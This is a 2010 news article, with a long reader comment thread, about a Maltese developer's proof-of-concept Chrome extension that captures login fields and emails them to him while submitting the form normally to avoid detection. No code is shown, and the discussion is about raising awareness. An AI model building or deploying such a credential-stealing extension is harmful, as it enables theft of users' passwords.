Maltese developer reveals vulnerability in Google Chrome security
A Maltese software developer has described how he created a plugin for the Google Chrome browser that can watch users’ login information and send that information to him via email.
Andreas Grech used jQuery to write quickcode for the plugin and has been demonstrating the attack as a proof of concept. Writing in a blog, he said he he had tested his system against Facebook, Gmail, and Twitter.
Mr Grech explained how Google Chrome allowed the installation of third-party extensions that were used to extend the browser to add new features. The extensions were written in JavaScript and HTML and allowed manipulation of the DOM, amongst other features.
By allowing access to the DOM, an attacker could thus read form fields…including username and password fields.
"The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally as to avoid detection."
Mr Grech stressed that he had not stolen any Twitter, Facebook or Gmail accounts.
"In fact, I didn't even upload this extension to the Google Chrome repository. I have only tried this extension on myself, just to test and see if it works."
See Mr Grech's comments on
http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html
54 Comments
Post comment
Please sign in or create your Account to post comments.
Andreas Grech
Jul 15th 2010, 16:29
I have posted a second follow up on my post: http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html#update2
In this follow up, I talk about the malicious plugin that has just recently been discovered by Mozilla.
Daniel Gordon
Jul 15th 2010, 15:53
As my computer expert friend said after reading the comments below:
"Nerds are jealous haters".
Well done to Andreas for showing those who need to know, what is possible.
Those who already know, dont really need to comment.
Unless of course they are jealous haters.
Christian Sciberras
Aug 3rd 2010, 14:54
No, just realistic people. Andreas' post is akin to someone claiming to have made a virus....when people can (nowadays) create virii at the click of a button.
Please be realistic!
Gerry Said
Jul 15th 2010, 15:49
Congratulations Andreas, that's an interesting piece of work. It's not every day that a Maltese developer is featured on slashdot. Keep it up!
Evan Camilleri
Jul 15th 2010, 13:54
It would be interesting to know from Andreas if Google co-operated and shown interest in his discovery. In the past I had colleagues who discovered issues on other browsers who were totally ignored by the browser developer.
A.Cortis
Jul 15th 2010, 13:24
Well, the issue of plugins with web-browsers is not new at all. Installing an unreliable ActiveX component on Microsoft's Internet Explorer, used to (and still) have the same result as the one obtained by Mr.Grech, as stated here. The question here is how will he manage to install the plugin which he created on a specific individual's personal computer, without the same individual noting anything. That would be interesting to know. Ok, a relatively green user may install the plug-in when prompted to, but even the average user will discard such a trigger. So, sorry Andreas, it's no big deal. While congratulating you for your work, I have to say that it's not something which should raise the eyebrows to Google Chrome users. I am sure that with Microsoft's Internet Explorer 6, 6.5, 7 and 8......if people would know how many similar plugins (if not worse) exist, they would definitely prefer using google chrome. So, please, dear 'TImes of Malta', you can praise Mr.Grech's work as much as you deem necessary, but don't raise nonobjective concerns for Google Chrome users. Thanks, and happy browsing to everyone !!
Andreas Grech
Jul 15th 2010, 16:21
@A. Cortis:
Yes, installing a malicious ActiveX component in IE can have the same results but the point of the post was not to specifically target Google Chrome and not other browsers. I chose to work with Google Chrome because it has been allegedly dubbed as 'the safest browser' and so I thought it would be interesting to try this experiment on it.
As regards an individual not noting about the data leaks, take a look at this article: http://news.netcraft.com/archives/2010/07/15/firefox-security-test-add-on-was-backdoored.html
Just recently, a Mozilla Security Testing add-on was discovered to have had a backdoor which intercepted login details which were sent to the author of the add-on. Mozilla have said that this add-on has been downloaded ~1800 times and that it still had 334 active daily users (http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/). So, as you can see, it's really not that difficult to distribute such malicious add-ons. Keep in mind that such malicious code is usually hidden deep within the add-on as to avoid detection.
With that said, I hope you now see how important it still is to remind people about the dangers of installing 3rd party applications on their computers.
Andreas Grech
Jul 15th 2010, 16:34
The correct link of the Mozilla blog post is: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
In my previous reply, it has been incorrectly hyperlinked with the adjacent bracket and period :/
A Santos
Jul 14th 2010, 21:45
Thank you Andreas for sharing your knowledge with the rest of us through your blog. I am, however, disappointed with the Times of Malta fro choosing an inappropriate heading to this article, which clearly lead to their audience misunderstanding completely the goal of Andreas' research work.
Marcelle Buhagiar
Jul 14th 2010, 18:12
I would like to make people aware that not everybody has such computer skills to realise of this possibility. So thank you, Andreas.
Daniel Vassallo
Jul 14th 2010, 18:01
Well done Andreas for reaching critical mass with that blog post!... The timing of yesterday's Add-on Vulnerability Announcement by Mozilla is very interesting! ... Apart from the fact that it proves your point: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
Andreas Grech
Jul 15th 2010, 16:22
@Daniel Vassallo
Yes, the timing of such a discovery is perfect.
Here's another post that discusses this discovery: http://news.netcraft.com/archives/2010/07/15/firefox-security-test-add-on-was-backdoored.html
Daniel Vassallo
Jul 15th 2010, 22:03
The fact that the rogue Mozilla Sniffer Add-On was allowed to modify the code of the well-trusted Tamper Data Add-On is definitely a vulnerability in their plugin model. I wonder if that can happen in Chrome.
Stefan Grech
Jul 14th 2010, 12:39
Why all these negative comments ? for Christ's sake he's trying to increase the awareness of these plugins which some people install without even knowing what they consist of .. I think Mr. Grech did a great job increasing us the Google chrome users awareness, although it's the so called safest browser around, it still can be vulnerable to these third party plugins which could steal the user's personal information ! Please keep in mind that not all people are "computer experts" like most of you guys and some may find this article very useful indeed.
Darren Mizzi
Jul 15th 2010, 07:54
Andreas's point was to reprove and show again (especially to those who are not aquainted with such things) of the security implications.
Hence everyone is right in saying that this is no vulnerability. Had the article been about security and to prove such risks this code would be used then there would have been no issue - but to imply that a maltese developer revealed a vulnerabiliy in Google Chrome Security when all he did was showing how an existing known issue can be exploited is not correct. As a result the negative comments. I am more than sure that all the people want to be aware of security :)
Jurgen Grech
Jul 14th 2010, 10:33
Imma kif kulhadd irid imaqdar u jgerger fuq kollox f'dan il-pajjiz! Ta l-ghageb!!! Tuh prosit u daqshekk! Prosit Andreas! We not only share the same surname, but also the same passion for IT apparently!
Darren Mizzi
Jul 14th 2010, 08:00
First of all this is no vulnerability at all - and even if it was it has not been confirmed by Google so I think we should wait for their feedback. A piece of application using jQuery was written to access local information - nothing else! If this was uploaded to repository they will not accept it and even if they did it is 3rd Party non-trusted software which will warn you too.
The comments on Slashdot regarding this article from professional tech people confirm such a line of thought. http://tech.slashdot.org/article.pl?sid=10/07/10/1736205
Of course this is my opinion and nothing else.
Andreas Grech
Jul 14th 2010, 13:48
@Darren:
In my post, I have never stated that this is a vulnerability.
As regards not being accepted to the local repository, take a look at this Mozilla blog article: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
An add-on has been found in their repository which has affected hundreds of users. They clearly state that "Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review."
So if this technique is embedded in a fully-fledged extension that constantly sends requests, it won't be so easy to spot; and when it does get detected, maybe it could have already affected people: "Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. "
D.Galea
Jul 14th 2010, 03:04
When a vulnerability is discovered & you can be assured you these are discovered all the time simply because coding on such an open-source project is in continuous development, they are simply reported in this page ( http://code.google.com/p/chromium/issues/list ) & they are usually solved in a very short time.
For everyone's information Google chrome is just a branded repackaging of Chromium, for which I wrote an updater extension myself.
https://chrome.google.com/extensions/detail/hcmicnfbmcjhlbdohdmdhfjlbigkcddl
Mike Bugeja
Jul 14th 2010, 00:34
Mr.Grech is not uncovering any vulnerability at all (he even states this in his blog). He is just showing that by installing third-party plugins to any browser out there, has its risks.
So for those who are criticisizing him, they should first read his blog well.
Andreas Grech
Jul 14th 2010, 13:50
@Mike:
Thanks for your comment.
At least some people have understood the point of my post.
Michael Attard
Jul 13th 2010, 23:56
As usual, people miss the point of a proof of concept. The idea of any library (such as jQuery) is to avoid having to re-invent the wheel each time. If you want to do that, I pity you, because you're losing too much time doing somethings that have already been done.
What this guy here has done is put together a number of pieces, that demonstrate how the structure of Google Chrome can be abused. Couple this with some other future vulnerability that auto installs background plugins, and you get a big security risk.
It's these type of efforts that highlight flaws, that are useful to improve products such as browsers. Criticism of browsers such as this one will one help to make it better!!
Stop whining, and grow up!
Christian Sciberras
Jul 14th 2010, 08:36
It's not whining, it's being realistic. This is no such jQuery flaw, for your information, if someone executes some javascript, it doesn't require jQuery, at all.
As a comparison, I can boast I've found a new vulnerability in all existing browsers; allow a malicious attacker to somehow force a user to download a malicious file.
Except that such a vulnerability will probably get marked "no fix" in any bug tracking system...
I agree, people should grow up; if one had the ability to operate blogs it doesn't mean you're any particularly good at security. And shouting out flaws before even checking your work is even more immature.
C. Abela
Jul 13th 2010, 23:52
While I agree reports should always be as accurate as possible, as a layman and not a computer programmer, for me the point of this story is that he did it. This story succeeds in telling tells me that Google Chrome is not safe, like many other programs about. So from my point of view, as someone who does not know about computer programming which means I am like the majority of the population, yes this report definitely revealed a vulnerability in Google Chrome. So why split hairs? Isnt it a bit like buying a sipposed high security lock only to find it can be opened easily? Now whether the person who discovered the lock's weakness used a hairpin or a hammer, it still shows a weakness in my opinion.
Christian Sciberras
Jul 14th 2010, 08:39
OK, let me put this in layman's terms for you.
What he did can be replicated in ANY BROWSER (firefox msie opera safari etc) and exists SINCE THE 1990's, when Internet Explorer supported ActiveX plugins.
So sure, Google Chrome is "flawed"; as are all the the other browser. Now if you want to keep away from the Internet indefinitely, be my guest.
M Azzopardi
Jul 13th 2010, 23:18
Nothing groundbreaking here, simply a few lines of code which any one of us could have written. As well noted by other users, a Chrome user has to install the application for it to start doing some damage.
Mr Grech has only developed an application of which kind the online community has been warned to avoid for a number of years.
Andreas Grech
Jul 14th 2010, 14:10
@M. Azzoppardi:
Yes obviously any one who knows simple JavaScript could have written this code. So, what is your point exactly? I did not write the post to show my JavaScript skills.
And also, a user has to OK the extension before being installed in their browser, yes. Google Chrome and other browsers even give you a warning before installing 3rd party extensions. Yet, the reality is that many users disregard the warning completely.
Here's an example: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
That Mozilla article was written yesterday, and in it they talk about an add-on, Mozilla Sniffer, that intercepts login details and sends this data to a remote location:
"Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. "
The point of my post is to make people more aware that such malicious activities can happen, and just because a warning is presented to the user before installing, doesn't mean that the user will read it.
Maybe with a demonstration, like the example in my post, people will be more careful.
Adrian Borg
Jul 13th 2010, 21:12
Much ado about nothing!
Andreas here just produced malware and not uncovered any sort of issue in Google Chrome, as the thing he programmed is not part of Google Chrome and would never be approved!
Apart from that he just copied JQuery libraries and plugins developed by others and not developed his own.
I visited his blog and was not impressed at all ... just another mediocre wanna-be!
Andreas Grech
Jul 13th 2010, 22:05
@Adrian:
I did not produce any sort of malware. The reason I wrote the post is to make people more aware of the dangers concerning the installation of 3rd party applications. What I demonstrated was a proof of concept that an attacker could implement to steal login credentials.
I did not upload the extension to the Google Chrome repository because my intent was not to exploit people but to show what can be done.
The extension was written by myself using the jQuery framework and nothing was stolen. jQuery is dual-licensed under the MIT license and the GNU General Public License. If you think that I have stolen something, please review the specifications of those licenses and comment again.
Julian Esposito
Jul 13th 2010, 20:12
I'm sorry, but this is not a vulnerability! If you decide to install an unsafe plug-in from an untrusted source which has full access to the DOM, then YOU are asking for trouble. The vulnerability is the user, not Google Chrome. That is how plug-ins are meant to work.
Andreas Grech
Jul 13th 2010, 22:07
@Julian:
As you have correctly said, the "vulnerability" is the user, not the browser. That's why we need to make people more aware about the situation and what can be maliciously done with these extensions.
PS. I never used the word "vulnerability" in my post.
Joe Mifsud
Jul 13th 2010, 19:47
A plugin is essentially nothing more than a normal computer program which is run by some other program (usually with the
purpose to extend functionality to the calling program). Computer programs have existed which spy on users' actions for
ages!
Also, before publishing articles the times should try to verify their statements. This is not a vulnerability in Google
Chrome. The plugin is installed with the user's knowledge and the user has to provide a level of trust to the program.
Under the same assumption then I could say "I have found vulnerabilities in Windows/Mac/Linux" because it is fairly
trivial to write an application to monitor user actions and send it to myself by email.
I would rephrase this title to "Maltese developer develops spy plugin in for google chrome".
Also, I challenge the developer or other to gain access to my DOM in Google Chrome - obviously it is only possible if I
install the spyware/virus which he wrote...
Andreas Grech
Jul 13th 2010, 22:26
@Joe:
You have completely missed the point of my post. I didn't write this extension to spy on people. Why would you ever have such a misconception? Actually, come to think of it, have you even read my post?
First off, I have never said that this is a vulnerability in the Google Chrome browser. Secondly, as regards your comment about gaining access to "your DOM" (whatever that means), as I stated earlier on, you have completely missed the point of my post.
My post was to make users more aware that such malicious activities can happen when dabbling with 3rd party extensions. Since when has it become wrong to remind people about their security and protection of private data?
Joe Mifsud
Jul 14th 2010, 10:10
@Andreas
Also, I was not indicating that you wrote the plugin to spy on people. I said that you wrote spyware, which is true correct? I am not implying that you intend on using it for malicious purposes; but simply that you wrote a spyware plugin which is no different from the archives of spyware available on the net which come in many different forms including plugins. I made this statement to simply point out that no, as the times reported no 'vulnerability' was found. If you want to state that the users are the vulnerability (which is usually most often the case) that is fine, but the times should not pretend that this is breaking news :)
Jack Sparrow
Jul 13th 2010, 18:48
Browser extensions (whether Chrome, IE or Firefox) are meant to have access to the whole DOM. That's what gives them all their flexibility. And that is why before an extension can be released to the public, it has to be digitally signed using a certificate from a trusted certification authority which reviews the extension independently and flags it as safe if found to be so. Much fuss about nothing.
Rowena Scicluna
Jul 13th 2010, 18:42
@M.Caruana: What is "the traditional google"? Google Chrome is an internet Browser, whilst Google is an internet company that provides many online services & web applications, amongst them Chrome. They are definitely not the same thing.
M.Caruana
Jul 13th 2010, 21:47
What I meant by traditional google is the old search engine. I only tried installing the new chrome google and actually ended up infected with a virus instead. As others implied once you start installing unsafe plug ins you are asking for trouble. Even with active x one must be cautious.
JosephA Borg
Jul 15th 2010, 17:17
"even with AcitveX one must be cautious"
Actually ActiveX seems to be the worst security example you could come up with… I assume you installed the chromium plugin that makes IE sort of behave like a good internet citizen.
You might want to try a Google Chrome instead of IE or Firefox or Safari or Opera… they're all better choices than Internet Explorer … really …
Martin Spiteri
Jul 13th 2010, 18:37
@ Joe Polidano - There is no need to go to that extreme. I use Lynx browser, secure, fast etc. http://en.wikipedia.org/wiki/Lynx_(web_browser) For sure there is no better browser than it!
Also, the above is not a vulnerability, but the plugins in the browser have access to such information, by design! That is why users are recommended to know what they are installing!
Ivan Zammit
Jul 13th 2010, 18:31
'jQuery' is a powerful Javascript library and not something that the gentleman has developed. It is something that developers use to write code.
I'm aware that this is the so called 'silly season' and it is very tempting for journalists to write frivolous stuff. Perhaps it would be more opportune therefore to make sure that you get the facts right and before making a fuss about nothing!
Andreas Grech
Jul 15th 2010, 16:26
@Ivan Zammit:
Yes, it's unfortunate that such a mistake has been made by the reporter. Thankfully, it has now been fixed.
Oh and just to make it clear to everyone: I did not develop an extension named jQuery -_-
Joe Polidano
Jul 13th 2010, 18:23
To prevent such malicious attacks it is best to make use of the telnet client. Let me illustrate:
telnet www.google.com 80
Trying 72.14.221.104...
Connected to www.l.google.com.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 302 Found
Location: http://www.google.com.mt/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2ed7a5f917921f2b:TM=1279037985:LM=1279037985:S=qBKe5NeMKyiXtk9L; expires=Thu, 12-Jul-2012 16:19:45 GMT; path=/; domain=.google.com
Set-Cookie: NID=36=n9urDnedtmQMkpCuNVwM3JGv5GdtioYS7iMoBouKjl8vvKH4VjyG2Kq9KCRLIFRV4G6ImA8xAZCv1FP4l_MWgAX6iFmOuIftkvLuoxllTjWc2jQjU8leZyiqgqZEOUWL; expires=Wed, 12-Jan-2011 16:19:45 GMT; path=/; domain=.google.com; HttpOnly
Date: Tue, 13 Jul 2010 16:19:45 GMT
Server: gws
Content-Length: 222
X-XSS-Protection: 1; mode=block
302 Moved
302 Moved
The document has moved
here.
Connection closed by foreign host.
Not as fast as running Google chrome or any insecure web browser, but sure safer. Plus its built into all modern computers!
Joe Mifsud
Jul 13th 2010, 19:51
I'm not sure if this is sarcasm or not... if it is sarcasm and you are insinuating that users should use telnet to browse the web then good joke :)
If not, I have no idea what you are on about!
Also, if you try your example with on an SSL port the following error code is returned:
SSL Error Response: Z0BB1
O Darmanin
Jul 13th 2010, 23:01
Lol ... I loved this one !!! and maybe you'd need to interpret HTML code and execute all the scripts manually as well, trapping any security issues as you go along :)
good one.
Edward Vella
Jul 13th 2010, 18:06
I will still use google chrome regardless of this vulnerability. This problem can be solved by signing up to last pass and installing the google chrome extension. all you need to do is log into lastpass and not save your passwords on google chrome, but on lastpass. Its an online service and last pass will be the only password youll need to remember by heart for ever, it is also used on mozilla, internet explorer, on your iphone, blackberry, android, symbian and windows phone. try using this service, its free to use, and has premium features for 1$ a month which is less than 12 euros a year for a brilliant service.
here is the link
http://www.lastpass.com/
Joe Mifsud
Jul 13th 2010, 20:03
Besides sounding like an advert, you are incorrect in your assumption that lastpass helps with this 'vulnerability'.
Lastpass is simply a password manager. Your password is still entered into the browser programmatically using lastpass instead of using the keyboard. This results in the related changes in the DOM in the browser. This 'vulnerability' extracts information from the DOM. So, no last pass doesn't help. Even in other net attacks (such as man in the middle), the password is still sent over the same internet connections and using the same encodings, so it is just as vulnerable as not using last pass.
From what I can tell last pass will just cause pain for people who use it. If you rely on one password to use last pass (and last pass then outputs different passwords according to the site) - then what will you are not on your PC which has last pass installed? Or better yet when you are on a PC where you do not have access to install new software (such as last pass)? Seems like a hassle to me.
Christian Sciberras
Jul 13th 2010, 17:57
With regards to my earlier comment, note that I'm reproachful to the media's attention towards popular topics, rather than real news.
Ian Bugeja
Jul 13th 2010, 17:55
It's not a vulnerability but it's the way things work in any browser. That is why addons do get approved and undergo serious tests.
Most browsers do prompt users to be sure what they install before doing so. The same applies for anything you install.
Andreas Grech
Jul 13th 2010, 22:29
@Ian:
I never said that this is a vulnerability in the Google Chrome browser. And although it's true that users are warned before installing 3rd party applications, the reality is that the majority of users do not regard these warnings, and that was the point of my post.
I am simply saying that people should be careful about what they install on their computers.
Christian Sciberras
Jul 13th 2010, 17:54
Uhhh big deal?!
Browser plugins never meant to be "secure", starting from ActiveX, NPAPI (Firefox and co.), FireFox XUL and Opera. What makes Chrome any different?
He might have broke a layer of security in a browser which does not exist in others.
I think security issues such as dumps of the Maltese Central Bank DB or security policy issues on government websites would have been more newsworthy...
I guess it all comes down to having friends in he right places...
M.Caruana
Jul 13th 2010, 17:48
Well done Andreas Grech. We have so much talent in this country it is our best and only resource that saves us all. I never trusted and used google chrome myself. I prefer the traditional google much better.
Christian Sciberras
Jul 13th 2010, 18:23
What do you mean be "Google Chrome" and "traditional google"? If you're speaking of the search engine, it doesn't have anything to do with a web browser.
As to local talent...sure as long as you get them to cooperate. But that doesn't happen; we both have web developers from the 90's and modern "web 2.0" developers - each going their own way.
It's how competition works in Malta, it simply had to turn out to be destructive.
Andreas Grech
Jul 14th 2010, 00:44
@Christian:
"as long as you get them to cooperate. But that doesn't happen;"
What exactly are you implying?
Christian Sciberras
Jul 14th 2010, 08:40
That local companies do not cooperate at all??